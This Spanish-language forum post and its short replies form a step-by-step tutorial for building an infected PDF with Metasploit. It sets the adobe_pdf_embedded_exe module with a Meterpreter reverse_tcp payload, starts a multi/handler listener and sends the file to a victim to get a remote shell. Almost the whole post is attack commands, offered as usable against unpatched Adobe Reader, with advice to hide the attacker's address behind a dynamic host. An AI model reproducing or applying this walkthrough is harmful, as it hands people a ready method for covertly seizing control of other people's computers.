Muy buenas,
Aún y que esto ya está corregido en versiones posteriores a la 9.x todavía es factible su uso...
(http://www.arcpujol.com/AQUI/firma.jpg)
Vamos a crear un pdf infectado utilizando nuestro amigo metasploit...
Crearemos una conexión de la víctima a nosotros, aumentando en cierta medida el éxito de este ataque, puesto que conexiones externas suelen ser rechazadas por el firewall...
Abriremos una terminal y tecleamos:
msfconsole #quizá tengáis que usar sudo msfconsole...
(http://www.arcpujol.com/AQUI/m1.jpg)
Una vez cargado metasploit:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Este exploit nos ejecutará el PAYLOAD cuando la víctima abra el PDF... Vamos a darle a metasploit el nombre que tendrá nuestro PDF infectado:
set FILENAME aqqle.pdf
(http://www.arcpujol.com/AQUI/m2.jpg)
Ahora le indicamos el directorio del fichero PDF original a infectar, en mi caso:
set INFILENAME /home/bugtraq/Hacking/Manuales/mitm.pdf
Indicamos a metasploit el directorio de salida con:
set OUTPUTPATH /home/bugtraq/
Vamos a cargar el PAYLOAD a utilizar, en nuestro caso un reverse_tcp:
set PAYLOAD windows/meterpreter/reverse_tcp
Ok, configuramos ahora nuestra ip (mejor utilizar un NO-ip o similares, ya saben...)
set LHOST 192.168.0.199
Indicamos el puerto...
set LPORT 4455
Y configuramos el S.O y versión de Adobe Reader:
set id 0
(http://www.arcpujol.com/AQUI/m3.jpg)
Ahora toca hacer el exploit...
exploit
(http://www.arcpujol.com/AQUI/m4.jpg)
Dejaremos el exploit de lado para ponernos a la espera de nuestro PAYLOAD. Para ello:
back
Nos pondremos a la escucha usando:
use exploit/multi/handler
Le indicamos el PAYLOAD:
set PAYLOAD windows/meterpreter/reverse_tcp
Vamos a indicarle nuestra ip así como el puerto a la escucha:
set LHOST 192.168.0.199
set LPORT 4455
Indicamos id=0:
set id 0
(http://www.arcpujol.com/AQUI/m5.jpg)
Finalmente...
exploit
(http://www.arcpujol.com/AQUI/m6.jpg)
Enviamos nuestro archivo pdf infectado a una víctima, en nuestro caso un Windows XP SP2 y al abrirlo... Se hizo la luz!
(http://www.arcpujol.com/AQUI/m7.jpg)
Una vez aquí... cada uno que haga lo que quiera, lo suyo seria migrar a explorer etc..
Lo siento Sergi... ;-)
Saludos!
. _ ; _ _ . _ ; _ _ . _ ; . _ . . ; .
Estos tutoriales los has creado tu o son sacados de algun lado? estan buenos, por lo menos directos y sin vueltas ;)
Con las versiones nuevas de Adobe se pude hacer esto igualmente?
Mio 100%... y mi tiempo me he tirado con el tuto..
Con versiones actuales no funciona, lo pongo mas arriba.. De todas formas todavía es factible su uso.
Saludos